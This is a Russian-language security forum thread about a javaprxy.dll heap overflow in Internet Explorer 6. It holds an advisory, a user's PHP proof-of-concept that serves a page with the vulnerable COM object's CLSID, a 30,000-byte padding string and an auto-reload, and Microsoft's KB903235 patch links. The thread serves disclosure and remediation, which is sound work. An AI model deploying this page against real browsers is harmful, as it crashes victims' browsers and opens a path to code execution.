-
Переполнение буфера в Microsoft Internet Explorer (javaprxy.dll)
Переполнение буфера в Microsoft Internet Explorer в библиотеке javaprxy.dll
Программа: Microsoft Internet Explorer 6.0.2900.2180
Опасность: Высокая
Наличие эксплоита: Да
Описание:
Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании или выполнить произвольный код на целевой системе.
Переполнение кучи существует в библиотеке javaprxy.dll при обработке исключений в COM объектах. Удаленный пользователь может с помощью специально сформированной HTML страницы вызвать аварийное завершение работы браузера или выполнить произвольный код на целевой системе.
Пример/Эксполит: см. источник сообщения
URL производителя: microsoft.com
Решение: Способов устранения уязвимости не существует в настоящее время.
Источники:
http://www.securitylab.ru/55527.html ( http://www.securitylab.ru/55528.html )
http://security.nnov.ru/Enews942.html
-
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
Это прикол. Идё сюда http://www.securitylab.ru/55528.html и читаем:
microsoft does not confirm the vulnerability, as their product team can
not reproduce condition. however, they are looking at making changes to
handle COM objects in a more robust manner in the future.
Т.е. microsoft не подтвердила уязвимость, так как их программисты не могут воспроизвести условия.
При этом используя приведённый там же код я отлично воспроизвёл условие без всяких проблем.
Для тех кто не дружит с Перлом - код на PHP:
PHP код:
<?php
$clsid = '03D9F3F2-B0E3-11D2-B081-006008039BF0'; # javaprxy.dll
$html1 = "<html><body>\n<object
classid=\"CLSID:".$clsid."\"></object>\n";
$html2 = "\n</body><script>location.reload();</script></html>\n";
print "Content-Type: text/html;\r\n\r\n";
print $html1.str_repeat("A",30000).$html2;
?>
Последний раз редактировалось Geser; 24.01.2007 в 23:06.
-
-
An update available for a security vulnerability in the Javaprxy.dll COM object
Обновление системы безопасности для обозревателя Internet Explorer устраняющее уязвимость в Javaprxy.dll COM
Microsoft Knowledge Base Article 903235
Security Update for Internet Explorer for Windows XP Service Pack 2 (KB903235)
http://www.microsoft.com/downloads/i...splayLang%3den
Security Update for Internet Explorer 5.5 Service Pack 2 (KB903235)
http://www.microsoft.com/downloads/i...splayLang%3den
Security Update for Internet Explorer 5.01 for Windows 2000 (KB903235)
http://www.microsoft.com/downloads/i...splayLang%3den
Security Update for Internet Explorer 6 Service Pack 1 (KB903235)
http://www.microsoft.com/downloads/i...splayLang%3den
Security Update for Internet Explorer for Windows Server 2003 (KB903235)
http://www.microsoft.com/downloads/i...splayLang%3den
Security Update for Internet Explorer for Windows Server 2003 x64-bit Edition (KB903235)
http://www.microsoft.com/downloads/i...splayLang%3den
Security Update for Internet Explorer for Windows Server 2003 Itanium 64-bit Edition (KB903235)
http://www.microsoft.com/downloads/i...splayLang%3den
Последний раз редактировалось Shu_b; 07.07.2005 в 18:30.
-